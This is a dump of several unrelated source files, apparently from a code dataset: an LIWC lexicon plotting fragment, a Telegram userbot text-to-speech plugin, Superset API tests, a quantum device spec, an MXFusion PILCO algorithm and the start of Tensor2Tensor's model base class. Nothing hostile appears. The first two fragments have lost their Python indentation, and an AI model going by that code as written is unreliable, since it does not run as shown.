# get the two dictionaries that relate every dimension name
# with its corresponding number (value) in the lexicon dimension list
dim2num, num2dim = load_features(
os.path.join(BASE_DIR, 'PsycholinguisticDimensions.txt'))
####################################################
# Plot statistics of LIWC Lexicon
####################################################
    # The lexicon has 18504 words and, for each word, a feature vector of size 71.
    # Each dimension represents a category (for example affect, posemo, negemo etc.)
    # The vector contains '1' when this word is included in the particular category.
# Otherwise '0'.
# Using a bar plot we can decide which dimensions of this feature vector are useful for our work.
# initialization of count dictionary
dimensions = list(dim2num.keys())
dim_counts = {dim: 0 for dim in dimensions}
for word in lex:
ones = [i for i, x in enumerate(lex[word]) if x == '1']
for index in ones:
dim_counts[num2dim[index]] += 1
sorted_tuples = sorted(dim_counts.items(), key=lambda kv: kv[1])
x = [k[1] for k in sorted_tuples if k[1] > 500]
y = [k[0] for k in sorted_tuples if k[1] > 500]
plt.figure()
sns.barplot(x=x, y=y)
plt.title('Number of words for each dimension of the LIWC lexicon')
# plt.show()
plt.savefig('liwc_dims_statistics.png')
# plt.close()
print(len(lex))
def load_liwc_lex():
return load_liwc_lexicon(
os.path.join(BASE_DIR, 'PsycholinguisticLexicon.txt'))
# liwc_lex()
|
the-stack_106_23779 | """ Google Text to Speech
Available Commands:
.tts LanguageCode as reply to a message
.tts LanguageCode | text to speak"""
import asyncio
import os
import subprocess
from datetime import datetime
from gtts import gTTS
from uniborg.util import admin_cmd
@borg.on(admin_cmd("tts (.*)"))
async def _(event):
if event.fwd_from:
return
input_str = event.pattern_match.group(1)
start = datetime.now()
if event.reply_to_msg_id:
previous_message = await event.get_reply_message()
text = previous_message.message
lan = input_str
elif "|" in input_str:
lan, text = input_str.split("|")
else:
await event.edit("Invalid Syntax. Module stopping.")
return
text = text.strip()
lan = lan.strip()
if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY):
os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY)
required_file_name = Config.TMP_DOWNLOAD_DIRECTORY + "voice.ogg"
try:
#https://github.com/SpEcHiDe/UniBorg/commit/17f8682d5d2df7f3921f50271b5b6722c80f4106
tts = gTTS(text, lang=lan)
tts.save(required_file_name)
command_to_execute = [
"ffmpeg",
"-i",
required_file_name,
"-map",
"0:a",
"-codec:a",
"libopus",
"-b:a",
"100k",
"-vbr",
"on",
required_file_name + ".opus"
]
try:
t_response = subprocess.check_output(command_to_execute, stderr=subprocess.STDOUT)
except (subprocess.CalledProcessError, NameError, FileNotFoundError) as exc:
await event.edit(str(exc))
# continue sending required_file_name
else:
os.remove(required_file_name)
required_file_name = required_file_name + ".opus"
end = datetime.now()
ms = (end - start).seconds
await borg.send_file(
event.chat_id,
required_file_name,
# caption="Processed {} ({}) in {} seconds!".format(text[0:97], lan, ms),
reply_to=event.message.reply_to_msg_id,
allow_cache=False,
voice_note=True
)
os.remove(required_file_name)
await event.edit("Processed {} ({}) in {} seconds!".format(text[0:97], lan, ms))
await asyncio.sleep(5)
await event.delete()
except Exception as e:
await event.edit(str(e))
|
the-stack_106_23782 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import json
from typing import Optional
from unittest import mock
from superset.extensions import async_query_manager
from tests.base_tests import SupersetTestCase
from tests.test_app import app
class TestAsyncEventApi(SupersetTestCase):
UUID = "943c920-32a5-412a-977d-b8e47d36f5a4"
def fetch_events(self, last_id: Optional[str] = None):
base_uri = "api/v1/async_event/"
uri = f"{base_uri}?last_id={last_id}" if last_id else base_uri
return self.client.get(uri)
@mock.patch("uuid.uuid4", return_value=UUID)
def test_events(self, mock_uuid4):
async_query_manager.init_app(app)
self.login(username="admin")
with mock.patch.object(async_query_manager._redis, "xrange") as mock_xrange:
rv = self.fetch_events()
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
channel_id = app.config["GLOBAL_ASYNC_QUERIES_REDIS_STREAM_PREFIX"] + self.UUID
mock_xrange.assert_called_with(channel_id, "-", "+", 100)
self.assertEqual(response, {"result": []})
@mock.patch("uuid.uuid4", return_value=UUID)
def test_events_last_id(self, mock_uuid4):
async_query_manager.init_app(app)
self.login(username="admin")
with mock.patch.object(async_query_manager._redis, "xrange") as mock_xrange:
rv = self.fetch_events("1607471525180-0")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
channel_id = app.config["GLOBAL_ASYNC_QUERIES_REDIS_STREAM_PREFIX"] + self.UUID
mock_xrange.assert_called_with(channel_id, "1607471525180-1", "+", 100)
self.assertEqual(response, {"result": []})
@mock.patch("uuid.uuid4", return_value=UUID)
def test_events_results(self, mock_uuid4):
async_query_manager.init_app(app)
self.login(username="admin")
with mock.patch.object(async_query_manager._redis, "xrange") as mock_xrange:
mock_xrange.return_value = [
(
"1607477697866-0",
{
"data": '{"channel_id": "1095c1c9-b6b1-444d-aa83-8e323b32831f", "job_id": "10a0bd9a-03c8-4737-9345-f4234ba86512", "user_id": "1", "status": "done", "errors": [], "result_url": "/api/v1/chart/data/qc-ecd766dd461f294e1bcdaa321e0e8463"}'
},
),
(
"1607477697993-0",
{
"data": '{"channel_id": "1095c1c9-b6b1-444d-aa83-8e323b32831f", "job_id": "027cbe49-26ce-4813-bb5a-0b95a626b84c", "user_id": "1", "status": "done", "errors": [], "result_url": "/api/v1/chart/data/qc-1bbc3a240e7039ba4791aefb3a7ee80d"}'
},
),
]
rv = self.fetch_events()
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
channel_id = app.config["GLOBAL_ASYNC_QUERIES_REDIS_STREAM_PREFIX"] + self.UUID
mock_xrange.assert_called_with(channel_id, "-", "+", 100)
expected = {
"result": [
{
"channel_id": "1095c1c9-b6b1-444d-aa83-8e323b32831f",
"errors": [],
"id": "1607477697866-0",
"job_id": "10a0bd9a-03c8-4737-9345-f4234ba86512",
"result_url": "/api/v1/chart/data/qc-ecd766dd461f294e1bcdaa321e0e8463",
"status": "done",
"user_id": "1",
},
{
"channel_id": "1095c1c9-b6b1-444d-aa83-8e323b32831f",
"errors": [],
"id": "1607477697993-0",
"job_id": "027cbe49-26ce-4813-bb5a-0b95a626b84c",
"result_url": "/api/v1/chart/data/qc-1bbc3a240e7039ba4791aefb3a7ee80d",
"status": "done",
"user_id": "1",
},
]
}
self.assertEqual(response, expected)
def test_events_no_login(self):
async_query_manager.init_app(app)
rv = self.fetch_events()
assert rv.status_code == 401
def test_events_no_token(self):
self.login(username="admin")
self.client.set_cookie(
"localhost", app.config["GLOBAL_ASYNC_QUERIES_JWT_COOKIE_NAME"], ""
)
rv = self.fetch_events()
assert rv.status_code == 401
|
the-stack_106_23783 | """ Specification of IBM Q Rome """
#***************************************************************************************************
# Copyright 2015, 2019 National Technology & Engineering Solutions of Sandia, LLC (NTESS).
# Under the terms of Contract DE-NA0003525 with NTESS, the U.S. Government retains certain rights
# in this software.
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0 or in the LICENSE file in the root pyGSTi directory.
#***************************************************************************************************
qubits = ['Q' + str(x) for x in range(5)]
two_qubit_gate = 'Gcnot'
edgelist = [
('Q0', 'Q1'), ('Q1', 'Q0'),
('Q1', 'Q2'), ('Q2', 'Q1'),
('Q2', 'Q3'), ('Q3', 'Q2'),
('Q3', 'Q4'), ('Q4', 'Q3'),
]
spec_format = 'ibmq_v2019'
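
# --- Illustrative sketch (not part of the original spec) ---
# Shows how the directed edge list above could be folded into an adjacency
# map for quick connectivity checks. The helper name `build_adjacency` is
# hypothetical, not pyGSTi API.
def build_adjacency(edges):
    """Return a dict mapping each qubit to the sorted list of its neighbours."""
    adjacency = {}
    for src, dst in edges:
        adjacency.setdefault(src, set()).add(dst)
    return {q: sorted(neighbours) for q, neighbours in adjacency.items()}

# Example: build_adjacency(edgelist)['Q1'] == ['Q0', 'Q2'] for the linear
# Rome topology Q0 - Q1 - Q2 - Q3 - Q4.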
|
the-stack_106_23788 | # Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
# ==============================================================================
import mxnet as mx
from .inference_alg import SamplingAlgorithm
from ..common.config import get_default_dtype, get_default_device
class PILCOAlgorithm(SamplingAlgorithm):
"""
    Sampling-based inference algorithm for PILCO: it rolls sampled trajectories forward through the model and policy and returns the total cost.
:param model: the definition of the probabilistic model
:type model: Model
:param observed: A list of observed variables
:type observed: [Variable]
    :param num_samples: the number of sampled trajectories used when estimating the expected cost
:type num_samples: int
:param target_variables: (optional) the target variables to sample
:type target_variables: [UUID]
:param extra_graphs: a list of extra FactorGraph used in the inference
algorithm.
:type extra_graphs: [FactorGraph]
"""
def __init__(self, model, observed, cost_function, policy, n_time_steps, initial_state_generator, extra_graphs=None, num_samples=3, ctx=None, dtype=None):
"""
:param model: The model to use to generate the next state from a state/action pair.
:param observed: Observed variables for the model.
:param cost_function: The cost function to evaluate state/action pairs on.
:param policy: The policy function to determine what action to take next from a particular state.
:param n_time_steps: How many time steps to roll forward using the model+policy to generate a trajectory.
:param initial_state_generator: Function that generates initial states for the model to begin at.
:param num_samples: How many sample trajectories to compute at once
"""
super(PILCOAlgorithm, self).__init__(model, observed, extra_graphs=extra_graphs)
self.cost_function = cost_function
self.policy = policy
self.initial_state_generator = initial_state_generator
self.n_time_steps = n_time_steps
self.num_samples = num_samples
self.dtype = dtype if dtype is not None else get_default_dtype()
self.mxnet_context = ctx if ctx is not None else get_default_device()
def compute(self, F, variables):
"""
Compute the PILCO algorithm's policy computation loop.
1. Generates a number of initial state + action pairs
2. For each state+action pair:
1. Predict the new state (s_t_plus_1) given the current state and action pair
2. Compute the cost of being in that state
3. Use the policy to compute the next action (a_t_plus_1) to take from s_t_plus_1
4. Repeat n_time_steps into the future, using the previous round's state/action pairs to roll forward.
3. Return the total cost of all sample trajectories over time.
:param F: the execution context (mxnet.ndarray or mxnet.symbol)
:type F: Python module
:param variables: the set of MXNet arrays that holds the values of
variables at runtime.
:type variables: {str(UUID): MXNet NDArray or MXNet Symbol}
:returns: the outcome of the inference algorithm
:rtype: mxnet.NDArray or mxnet.Symbol
"""
s_0 = self.initial_state_generator(self.num_samples)
a_0 = self.policy(s_0)
a_t_plus_1 = a_0
x_t = F.expand_dims(F.concat(s_0, a_0, dim=1), axis=1)
cost = 0
for t in range(self.n_time_steps):
variables[self.model.X] = x_t
res = self.model.Y.factor.predict(F, variables, targets=[self.model.Y], num_samples=self.num_samples)[0]
s_t_plus_1 = res[0]
cost = cost + self.cost_function(s_t_plus_1, a_t_plus_1)
a_t_plus_1 = mx.nd.expand_dims(self.policy(s_t_plus_1), axis=2)
x_t = mx.nd.concat(s_t_plus_1, a_t_plus_1, dim=2)
total_cost = F.sum(cost)
return total_cost, total_cost
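
# --- Illustrative sketch (not part of the original module) ---
# A framework-free outline of the rollout loop implemented in
# PILCOAlgorithm.compute above: propagate sampled states through a dynamics
# model and a policy for n_time_steps and accumulate the cost. The callables
# `dynamics_model`, `policy_fn` and `cost_fn` are hypothetical stand-ins,
# not MXFusion API.
def rollout_cost_sketch(initial_states, dynamics_model, policy_fn, cost_fn, n_time_steps):
    total_cost = 0.0
    states = initial_states
    # initial actions come from applying the policy to the initial states
    actions = [policy_fn(s) for s in states]
    for _ in range(n_time_steps):
        # 1. predict the next state for every (state, action) pair
        next_states = [dynamics_model(s, a) for s, a in zip(states, actions)]
        # 2. accumulate the cost of the new states with the actions that led to them
        total_cost += sum(cost_fn(s, a) for s, a in zip(next_states, actions))
        # 3. let the policy pick the next action from the new states
        actions = [policy_fn(s) for s in next_states]
        states = next_states
    return total_cost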
|
the-stack_106_23789 | # coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""T2TModel Base Class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import contextlib
import copy
import functools
import math
import time
import six
from tensor2tensor.data_generators import multi_problem
from tensor2tensor.data_generators import text_encoder
from tensor2tensor.data_generators.problem import problem_hparams_to_features
from tensor2tensor.layers import common_layers
from tensor2tensor.utils import beam_search
from tensor2tensor.utils import decoding
from tensor2tensor.utils import expert_utils as eu
from tensor2tensor.utils import learning_rate
from tensor2tensor.utils import metrics
from tensor2tensor.utils import modality
from tensor2tensor.utils import optimize
from tensor2tensor.utils import quantization
from tensor2tensor.utils import registry
import tensorflow as tf
from tensorflow.python.layers import base
from tensorflow.python.ops import inplace_ops
from tensorflow.python.ops import variable_scope
_no_problem_err_str = (
"The default implementation of %s requires that the "
"model be used with a Problem. If using a Problem, augment the "
"hparams object with trainer_lib.add_problem_hparams. If not, "
"override %s.")
_no_problem_err = (
lambda method_name: _no_problem_err_str % (method_name, method_name))
class T2TModel(base.Layer):
"""Abstract base class for models.
`T2TModel` has three typical usages:
1. Estimator: The method `make_estimator_model_fn` builds a `model_fn` for
the tf.Estimator workflow of training, evaluation, and prediction.
It performs the method `call`, which performs the core computation,
followed by `estimator_spec_train`, `estimator_spec_eval`, or
`estimator_spec_predict` depending on the tf.Estimator mode.
  2. Layer: The method `call` enables `T2TModel` to be used as a callable by
itself. It calls the following methods:
* `bottom`, which transforms features according to `problem_hparams`' input
and target `Modality`s;
* `body`, which takes features and performs the core model computation to
return output and any auxiliary loss terms;
* `top`, which takes features and the body output, and transforms them
according to `problem_hparams`' input and target `Modality`s to return
the final logits;
* `loss`, which takes the logits, forms any missing training loss, and sums
all loss terms.
3. Inference: The method `infer` enables `T2TModel` to make sequence
predictions by itself.
Subclasses generally only need to override `body`.
"""
REGISTERED_NAME = None # Updated on registration.
def __init__(self,
hparams,
mode=tf.estimator.ModeKeys.TRAIN,
problem_hparams=None,
data_parallelism=None,
decode_hparams=None,
**kwargs):
"""Creates a T2TModel.
Args:
hparams: tf.contrib.training.HParams, model hyperparameters.
mode: tf.estimator.ModeKeys, the execution mode.
problem_hparams: tf.contrib.training.HParams, hyperparameters for the
Problem. If provided here or in hparams.problem_hparams, the model will
automatically determine bottom, top, and loss methods. If not provided,
calling the model will only invoke body.
data_parallelism: a expert_utils.Parallelism object,
specifies devices for data parallelism.
decode_hparams: a hyperparameter object with decoding parameters.
See decoding.decode_hparams.
**kwargs: arguments to pass to base.Layer constructor.
"""
# Determine name first: use registered name if possible, class name else.
default_name = registry.default_name(type(self))
name = self.REGISTERED_NAME or default_name
super(T2TModel, self).__init__(
trainable=mode == tf.estimator.ModeKeys.TRAIN, name=name, **kwargs)
if not problem_hparams and hasattr(hparams, "problem_hparams"):
problem_hparams = hparams.problem_hparams
self._problem_hparams = problem_hparams
# Setup hparams
hparams = copy.copy(hparams)
if self._problem_hparams and hparams.shared_embedding_and_softmax_weights:
# If vocabularies differ, unset shared_embedding_and_softmax_weights.
input_modality = self._problem_hparams.modality.get("inputs")
target_modality = self._problem_hparams.modality.get("targets")
if (isinstance(input_modality, modality.Modality) and
isinstance(target_modality, modality.Modality) and
input_modality.top_dimensionality !=
target_modality.top_dimensionality):
log_info("Unsetting shared_embedding_and_softmax_weights.")
hparams.shared_embedding_and_softmax_weights = 0
self._original_hparams = hparams
self.set_mode(mode)
self._decode_hparams = copy.copy(decode_hparams or
decoding.decode_hparams())
self._data_parallelism = data_parallelism or eu.Parallelism([""])
self._num_datashards = self._data_parallelism.n
self._ps_devices = self._data_parallelism.ps_devices
self._eager_var_store = create_eager_var_store()
if not common_layers.is_xla_compiled():
self.summarize_hparams()
self._variable_scopes = {}
def _add_variable_scope(self, key, vs):
if key not in self._variable_scopes:
self._variable_scopes[key] = vs
def summarize_hparams(self):
def create_hparams_summary(hparams, name):
hparams_strs = [tf.convert_to_tensor([k, str(v)])
for k, v in hparams.values().items()]
tf.summary.text(name, tf.stack(hparams_strs))
create_hparams_summary(self._hparams, "%s_hparams" % self.name)
if self._problem_hparams:
create_hparams_summary(self._problem_hparams,
"%s_problem_hparams" % self.name)
# Replace the two methods below in order to add custom SessionRunHooks to
# the training procedure.
@staticmethod
def train_hooks(hook_context):
return []
@staticmethod
def eval_hooks(hook_context):
return []
@property
def hparams(self):
return self._hparams
@property
def is_training(self):
return self._hparams.mode == tf.estimator.ModeKeys.TRAIN
@property
def is_predicting(self):
return self._hparams.mode == tf.estimator.ModeKeys.PREDICT
@property
def has_input(self):
if self._problem_hparams:
return "inputs" in self._problem_hparams.modality
else:
return True
@property
def _custom_getter(self):
if self.hparams.weight_dtype == "bfloat16":
if self.hparams.optimizer != "Adafactor":
raise NotImplementedError(
"weight_dtype=bfloat16 only implemented with Adafactor optimizer")
return quantization.EighthPowerEncoding().custom_getter(
activation_dtype=tf.bfloat16
if self.hparams.activation_dtype == "bfloat16" else tf.float32)
elif self.hparams.activation_dtype == "bfloat16":
return quantization.bfloat16_activations_var_getter
else:
return None
@property
def _target_modality_is_real(self):
"""Whether the target modality is real-valued."""
target_modality = self._problem_hparams.modality["targets"]
return target_modality.name.startswith("real_")
def call(self, inputs, **kwargs):
del kwargs
features = inputs
set_custom_getter_compose(self._custom_getter)
tf.get_variable_scope().set_initializer(
optimize.get_variable_initializer(self.hparams))
with self._eager_var_store.as_default():
self._fill_problem_hparams_features(features)
summarize_features(features, num_shards=self._num_datashards)
sharded_features = self._shard_features(features)
sharded_logits, losses = self.model_fn_sharded(sharded_features)
if isinstance(sharded_logits, dict):
concat_logits = {}
for k, v in six.iteritems(sharded_logits):
concat_logits[k] = tf.concat(v, 0)
return concat_logits, losses
else:
return tf.concat(sharded_logits, 0), losses
@staticmethod
def has_symmetric_shards(model_name):
# model_fn is sharded symmetrically unless the model overrides body_sharded
# method to manually control the sharding.
model_cls = registry.model(model_name)
return not model_cls.use_body_sharded()
@staticmethod
def use_body_sharded():
return False
def body_sharded(self, sharded_features):
raise NotImplementedError("Models that wish to manually control sharding, "
"e.g. MoE models, should override body_sharded "
"and set use_body_sharded to True.")
def model_fn_sharded(self, sharded_features):
dp = self._data_parallelism
datashard_to_features = self._to_features_per_datashard(sharded_features)
if self.use_body_sharded():
# MoE models override body_sharded
transformed_features = dp(self.bottom, datashard_to_features)
body_out = self.body_sharded(
self._to_single_features_dict(transformed_features))
body_out, losses = self._normalize_body_output(body_out)
if "training" in losses:
log_info("Skipping T2TModel top and loss because training loss "
"returned from body")
sharded_logits = body_out
else:
if isinstance(body_out, dict):
sharded_logits = collections.OrderedDict()
sharded_losses = collections.OrderedDict()
for k, v in sorted(six.iteritems(body_out)):
sharded_logits[k] = dp(self.top, v, datashard_to_features)
sharded_losses[k] = dp(self.loss, sharded_logits[k],
datashard_to_features)
training_loss_dict = average_sharded_losses([{
"training": l
          } for loss in sharded_losses.values() for l in loss])
losses.update(training_loss_dict)
else:
sharded_logits = dp(self.top, body_out, datashard_to_features)
sharded_losses = dp(self.loss, sharded_logits, datashard_to_features)
if isinstance(sharded_losses, tuple):
nums, dens = sharded_losses
sharded_losses = zip(nums, dens)
training_loss_dict = average_sharded_losses([{
"training": loss
} for loss in sharded_losses])
losses.update(training_loss_dict)
else:
sharded_logits, sharded_losses = dp(self.model_fn, datashard_to_features)
if isinstance(sharded_logits[0], dict):
temp_dict = {k: [] for k, _ in six.iteritems(sharded_logits[0])}
for k, _ in six.iteritems(sharded_logits[0]):
for l in sharded_logits:
temp_dict[k].append(l[k])
sharded_logits = temp_dict
losses = average_sharded_losses(sharded_losses)
# TODO(rsepassi): Reenable scheduled sampling
# Disabled because of model_fn_sharded refactor
#
# do_scheduled_sampling = ( # Only do it if training and set for it.
# self.hparams.scheduled_sampling_prob > 0.0 and
# self.hparams.mode == tf.estimator.ModeKeys.TRAIN)
# if do_scheduled_sampling:
# sharded_logits, losses = scheduled_sampling(
# self.hparams, self._problem_hparams, dp,
# sharded_logits, losses, sharded_features,
# transformed_features, self)
return sharded_logits, losses
def model_fn(self, features):
with tf.variable_scope(tf.get_variable_scope(), use_resource=True) as vs:
self._add_variable_scope("model_fn", vs)
transformed_features = self.bottom(features)
if self.hparams.activation_dtype == "bfloat16":
for k, v in sorted(six.iteritems(transformed_features)):
if v.dtype == tf.float32:
transformed_features[k] = tf.cast(v, tf.bfloat16)
with tf.variable_scope("body") as body_vs:
self._add_variable_scope("body", body_vs)
log_info("Building model body")
body_out = self.body(transformed_features)
output, losses = self._normalize_body_output(body_out)
if "training" in losses:
log_info("Skipping T2TModel top and loss because training loss "
"returned from body")
logits = output
else:
logits = self.top(output, features)
losses["training"] = 0.0
if (self._hparams.mode != tf.estimator.ModeKeys.PREDICT and
self._hparams.mode != "attack"):
losses["training"] = self.loss(logits, features)
return logits, losses
def bottom(self, features):
"""Transforms features to feed into body.
Args:
features: dict of str to Tensor. Typically it is the preprocessed data
batch after Problem's preprocess_example().
Returns:
transformed_features: dict of same key-value pairs as features. The value
Tensors are newly transformed.
"""
if not self._problem_hparams:
log_warn("Without a Problem, T2TModel.bottom is a passthrough.")
return features
transformed_features = collections.OrderedDict()
all_previous_modalities = []
target_modality = _create_target_modality(self._problem_hparams.modality)
# Transform features via its corresponding modality.
for feature_name, modality_obj in sorted(
six.iteritems(self._problem_hparams.modality)):
if feature_name not in features:
tf.logging.warning("Missing feature %s - ignoring." % feature_name)
continue
# Use if-else clauses to preserve behavior of previous changes: namely,
# the variable scope name for the targets feature if there is only one
# target modality; and to reuse variable scopes for only input modalities.
if feature_name in target_modality:
if len(target_modality) > 1:
variable_scope_name = "%s/%s" % (modality_obj.name, feature_name)
else:
variable_scope_name = modality_obj.name
# TODO(aidangomez): share variables?
with tf.variable_scope(variable_scope_name) as vs:
self._add_variable_scope(variable_scope_name, vs)
log_info("Transforming feature '%s' with %s.targets_bottom",
feature_name,
modality_obj.name)
transformed_features[feature_name] = modality_obj.targets_bottom(
features[feature_name])
else:
do_reuse = modality_obj.name in all_previous_modalities
with tf.variable_scope(modality_obj.name, reuse=do_reuse) as vs:
self._add_variable_scope(modality_obj.name, vs)
log_info("Transforming feature '%s' with %s.bottom",
feature_name,
modality_obj.name)
transformed_features[feature_name] = modality_obj.bottom(
features[feature_name])
all_previous_modalities.append(modality_obj.name)
for key in features:
if key not in transformed_features:
# For features without a modality, we pass them along as is
transformed_features[key] = features[key]
else:
# Other features get passed along with the "raw" suffix
transformed_features[key + "_raw"] = features[key]
return transformed_features
def body(self, features):
"""Computes the targets' pre-logit activations given transformed inputs.
Most `T2TModel` subclasses will override this method.
Args:
features: dict of str to Tensor, where each Tensor has shape [batch_size,
..., hidden_size]. It typically contains keys `inputs` and `targets`.
Returns:
output: Tensor of pre-logit activations with shape [batch_size, ...,
hidden_size].
losses: Either single loss as a scalar, a list, a Tensor (to be averaged),
or a dictionary of losses. If losses is a dictionary with the key
"training", losses["training"] is considered the final training
loss and output is considered logits; self.top and self.loss will
be skipped.
"""
raise NotImplementedError("Abstract Method")
def _top_single(self, body_output, target_modality, features):
if not target_modality:
log_warn("Without a Problem, T2TModel.top is a passthrough.")
return body_output
with tf.variable_scope(target_modality.name) as tm_vs:
self._add_variable_scope(tm_vs.name, tm_vs)
log_info("Transforming body output with %s.top", target_modality.name)
last_only = (
target_modality.top_is_pointwise and
self.hparams.mode == tf.estimator.ModeKeys.PREDICT and
not self.hparams.force_full_predict)
if not last_only:
logits = target_modality.top(body_output, features.get("targets"))
else:
# Take body outputs for the last position only, and targets too.
if "decode_loop_step" not in features:
last_position_body_output = tf.expand_dims(
body_output[:, -1, :, :], axis=[1])
last_position_targets = tf.expand_dims(
features["targets"][:, -1, :, :], axis=[1])
else:
body_output_shape = body_output.shape.as_list()
last_position_body_output = tf.slice(
body_output, [0, features["decode_loop_step"][0], 0, 0], [
body_output_shape[0], 1, body_output_shape[2],
body_output_shape[3]
])
target_shape = features["targets"].shape.as_list()
last_position_targets = tf.slice(
features["targets"], [0, features["decode_loop_step"][0], 0, 0],
[target_shape[0], 1, target_shape[2], target_shape[3]])
logits = target_modality.top(last_position_body_output,
last_position_targets)
return logits
def top(self, body_output, features):
"""Computes logits given body output and features.
Args:
body_output: dict of str to Tensor, comprising one key-value pair for each
target. Each value denotes the target's pre-logit activations.
Alternatively, it may be a single Tensor denoting the pre-logits for
that target.
features: dict of str to Tensor. Typically it is the preprocessed data
batch after Problem's preprocess_example().
Returns:
logits: dict of str to Tensor, denoting each logits for each target; or
a single Tensor denoting the logits for that target.
"""
if isinstance(body_output, dict):
if self._problem_hparams:
target_modality = _create_target_modality(
self._problem_hparams.modality)
else:
target_modality = {k: None for k in body_output.keys()}
for k in body_output.keys():
assert k in target_modality.keys(), (
"The key %s of model_body's returned logits dict must be in "
"problem_hparams.modality's dict." % k)
logits = {}
for k, v in six.iteritems(body_output):
# TODO(aidangomez): share variables here?
with tf.variable_scope(k) as top_vs:
self._add_variable_scope("top_%s" % k, top_vs)
logits[k] = self._top_single(v, target_modality[k], features)
return logits
else:
if self._problem_hparams:
target_modality = _create_target_modality(
self._problem_hparams.modality)
else:
target_modality = None
if isinstance(target_modality, dict):
assert "targets" in target_modality, (
"model_body returned single logits so 'targets' must be a key "
"since problem_hparams.modality is a dict.")
target_modality = target_modality["targets"]
return self._top_single(body_output, target_modality, features)
def _loss_single(self, logits, target_modality, feature):
# The current bfloat16 version still uses float32 for most parts of backward
# propagation to keep model quality, so cast back before computing the loss
# value.
if not target_modality:
log_warn(_no_problem_err("loss"))
return (tf.constant(0., dtype=tf.float32),
tf.constant(1., dtype=tf.float32))
loss_num, loss_den = target_modality.loss(logits, feature)
loss_num *= self._problem_hparams.loss_multiplier
if hasattr(self.hparams, "problem") and hasattr(
self.hparams.problem, "task_list"):
loss_num, loss_den, summaries = multi_problem.aggregate_task_losses(
self.hparams,
self._problem_hparams,
logits,
target_modality,
feature
)
for key, val in summaries:
tf.summary.scalar(key, val)
return loss_num, loss_den
def loss(self, logits, features):
if isinstance(logits, dict):
if self._problem_hparams:
target_modality = _create_target_modality(
self._problem_hparams.modality)
else:
target_modality = {k: None for k in logits.keys()}
for k in logits.keys():
assert k in target_modality.keys(), (
"The key %s of model_body's returned logits dict must be in "
"problem_hparams.modality's dict." % k)
losses = {}
for k, v in six.iteritems(logits):
losses[k] = self._loss_single(v, target_modality[k], features[k])
n, d = losses[k]
if common_layers.should_generate_summaries():
tf.summary.scalar(k + "_loss", n / d)
tf.summary.scalar(k + "_loss_num", n)
tf.summary.scalar(k + "_loss_den", d)
if getattr(self.hparams, "visualize_logits_histogram", False):
hist = tf.summary.histogram
hist(k + "_predict", tf.argmax(tf.squeeze(v), axis=-1))
hist(k + "_targets", features[k])
return tf.add_n([n / d for n, d in losses.values()])
else:
if self._problem_hparams:
target_modality = _create_target_modality(
self._problem_hparams.modality)
else:
target_modality = None
if isinstance(target_modality, dict):
assert "targets" in target_modality, (
"model_body returned single logits so 'targets' must be a key "
"since problem_hparams.modality is a dict.")
target_modality = target_modality["targets"]
return self._loss_single(logits, target_modality, features["targets"])
def optimize(self, loss, num_async_replicas=1, use_tpu=False):
"""Return a training op minimizing loss."""
lr = learning_rate.learning_rate_schedule(self.hparams)
if num_async_replicas > 1:
log_info("Dividing learning rate by num_async_replicas: %d",
num_async_replicas)
lr /= math.sqrt(float(num_async_replicas))
train_op = optimize.optimize(loss, lr, self.hparams, use_tpu=use_tpu)
return train_op
def set_mode(self, mode):
"""Set hparams with the given mode."""
log_info("Setting T2TModel mode to '%s'", mode)
hparams = copy.copy(self._original_hparams)
hparams.add_hparam("mode", mode)
# When not in training mode, set all forms of dropout to zero.
if mode != tf.estimator.ModeKeys.TRAIN:
for key in hparams.values():
if key.endswith("dropout") or key == "label_smoothing":
log_info("Setting hparams.%s to 0.0", key)
setattr(hparams, key, 0.0)
self._hparams = hparams
if self._problem_hparams:
# Set model hparams in problem_hparams' modalities, which also store them.
for modality_obj in six.itervalues(self._problem_hparams.modality):
if modality_obj is not None:
modality_obj._model_hparams = self._hparams # pylint: disable=protected-access
def prepare_features_for_infer(self, features):
"""Called before inference to allow adding infer-specific features."""
pass
def eval_autoregressive(self, features=None, decode_length=50):
"""Autoregressive eval.
Quadratic time in decode_length.
Args:
features: an map of string to `Tensor`
decode_length: an integer. How many additional timesteps to decode.
Returns:
logits: `Tensor`
losses: a dictionary: {loss-name (string): floating point `Scalar`}.
Contains a single key "training".
"""
results = self._slow_greedy_infer(features, decode_length=decode_length)
return results["logits"], results["losses"]
def _fill_problem_hparams_features(self, features):
if features is not None:
for k, v in sorted(
six.iteritems(problem_hparams_to_features(self._problem_hparams))):
if k not in features:
features[k] = tf.constant(v, name=k)
def infer(self,
features=None,
decode_length=50,
beam_size=1,
top_beams=1,
alpha=0.0,
use_tpu=False):
"""A inference method.
Quadratic time in decode_length.
Args:
features: an map of string to `Tensor`
